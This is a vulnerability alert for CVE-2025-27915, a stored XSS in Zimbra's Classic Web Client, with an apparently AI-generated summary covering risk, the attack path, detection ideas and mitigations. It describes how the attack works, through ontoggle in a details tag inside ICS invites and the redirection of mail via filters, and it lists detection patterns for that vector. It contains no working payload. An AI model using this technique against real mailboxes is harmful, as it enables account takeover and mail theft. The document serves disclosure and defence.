CVE Alert: CVE-2025-27915 – n/a – n/a
CVE-2025-27915
An issue was discovered in Zimbra Collaboration (ZCS) 9.0 and 10.0 and 10.1. A stored cross-site scripting (XSS) vulnerability exists in the Classic Web Client due to insufficient sanitization of HTML content in ICS files. When a user views an e-mail message containing a malicious ICS entry, its embedded JavaScript executes via an ontoggle event inside a <details> tag. This allows an attacker to run arbitrary JavaScript within the victim’s session, potentially leading to unauthorized actions such as setting e-mail filters to redirect messages to an attacker-controlled address. As a result, an attacker can perform unauthorized actions on the victim’s account, including e-mail redirection and data exfiltration.
AI Summary Analysis
Risk verdict
Active exploitation is being reported for this stored XSS in Zimbra Classic Web Client; patching should be treated with high urgency.
Why this matters
Successful abuse allows an attacker to run arbitrary JavaScript in a victim’s session, enabling unauthorised actions such as mail redirection and data exfiltration within the account. Because the vector is network-delivered and requires user interaction, impact is concentrated on compromised accounts but can still lead to credential loss or targeted information leakage.
Most likely attack path
An attacker sends a malicious ICS entry via email; a recipient views the message, triggering the embedded JavaScript through the ontoggle event in a details tag. With network access and low attack complexity, the attacker can perform actions in the victim’s mailbox (e.g., forwarding rules) without elevated privileges, though user interaction is required. If successful, this can enable limited lateral movement to other accounts or broader data exposure within the compromised tenant, depending on mail flow rules and permissions.
Who is most exposed
Organisations using on-premises or hosted Zimbra Collaboration with the Classic Web Client, especially where external ICS/calendar invites encounter end users frequently.
Detection ideas
- Unusual or newly created mail forwarding rules following calendar invites
- Alerts for calendar invites containing ICS attachments with embedded scripts or anomalous ontoggle/details usage
- Unexpected changes to mailbox or filter settings after opening a calendar item
- User reports of browser console activity or anomalous script execution within Zimbra sessions
- IDS/IPS detections of malicious ICS content or abnormal calendar event processing
Mitigation and prioritisation
- Apply vendor security fixes; upgrade to a patched release per Zimbra advisories (target the latest secure 10.x or 9.x build).
- If patching is delayed, implement compensating controls: restrict or sandbox ICS attachments, block external ICS invites where feasible, and enhance gateway filtering for calendar content.
- Enforce strict change-management for mailbox rules and forwarding configurations; require approval for rule changes and monitor for rapid rule churn.
- Strengthen user awareness on ICS invites and suspicious calendar items; provide incident response guidance for potential session compromise.
- Plan and conduct a targeted patch window; verify remediation in a staging environment before broad rollout.
A considerable amount of time and effort goes into maintaining this website, creating backend automation and creating new features and content for you to make actionable intelligence decisions. Everyone that supports the site helps enable new functionality.
If you like the site, please support us on “Patreon” or “Buy Me A Coffee” using the buttons below
To keep up to date follow us on the below channels.
